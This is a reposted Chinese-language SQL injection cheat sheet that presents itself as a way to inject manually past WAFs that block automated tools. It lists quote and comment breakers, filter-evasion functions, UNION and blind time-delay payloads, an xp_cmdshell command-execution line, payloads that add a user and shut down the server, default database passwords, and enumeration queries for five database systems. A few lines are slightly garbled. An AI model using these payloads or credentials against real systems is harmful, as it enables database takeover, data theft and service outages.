常见的SQL注入检测语句（转载）

0x00 前言

现在很多WAF都能拦截sqlmap、havij 等注入工具的发包注入，所以这时我们需要在浏览器上使用hackerbar 进行手工注入，或者说是手工绕过注入攻击

0x01 发现SQL 注入

1 查询语法中断：单引号(  ‘  ), 双引号( “  )

2 SQL注释注入：双连字符  (-- ), 散列 (# ), 注释( /* )

3 扩展/附加查询： 分号 (  ;  )

4 注射/绕过过滤器：使用 CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CONVERT(), NULL  来转换上面的注入字符

0x02 常用的SQL注入命令

1 Union注入：Union all select NULL (Multiple columns)

2 命令执行：1;exec master..xp_cmdshell ‘dir’>C:\inetpub\wwwroot\dir.txt’ OR master.dbo.xp_cmdshell

3 加载文件：LOAD_FILE(), User UTL_FILE and utfReadfileAsTable

4 添加用户：1’; insert into users values(‘nto’,’nto123’)

5 DOS攻击：1’;shutdown –

6 获取字段： select name from syscolumns where id =(select id FROM sysobjects where name = ‘target table name’) – (Union can help)Co

0x02 常用的SQL盲注命令

1 快速检测：AND 1=1, AND 1=0

2 查询用户：1+AND+USER_NAME()=’dbo’

3 延时注入：1;waitfor+delay+’0:0:10’

4 检查SA用户：SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115

5 跳转/休眠：BENCHMARK(TIMES, TASK), pg_sleep(10)

0x03 数据库的默认用户名

Oracle                  scott/tiger, dbsnmp/dbsnmp
MySQL                  mysql/<BLANK>, root/<BLANK>
PostgreSQL        postgres/<BLANK>
MS-SQL               sa/<BLANK>
DB2                     db2admin/db2admin

0x04 常见的后台数据库SQL注入命令

1 MySQL

Grab                              @@version
Users                            * from mysql.user
Tables                         table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Database                    distinct(db) FROM mysql.db
Columns                    table_schema, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ AND table_name == ‘<TABLENAME>’
Running User               user()

2 MS-SQL
Grab version           @@version
Users                      name FROM master..syslogins
Tables                     name FROM master..sysobjects WHERE xtype = ‘U’
Database                name FROM master..sysdatabases;
Columns                name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘<TABLENAME’)
Running User        DB_NAME()

3 Oracle
Grab  version          table v$version compare with ‘Oracle%’
Users                      * from dba_users
Tables                      table_name from all_tables
Database                distinct owner from all_tables
Columns                 column_name from all_tab_columns where table_name=‘<TABLENAME>
Running User        user from dual

4 IBM DB2
Grab version          Versionnumber from sysibm.sysversions;
Users                      user from sysibm.sysdummy1
Tables                    name from sysibm.systables
Database               schemaname from syscat.schemata
Columns                name, tbname, coltype from sysibm.syscolumns
Running User        user from sysibm.sysdummy1

5 PostgreSQL
Grab version           version()
Users                     * from pg_user
Database                datname FROM pg_database
Running User         user;

链接是：https://blog.csdn.net/qq_29277155/article/details/51248089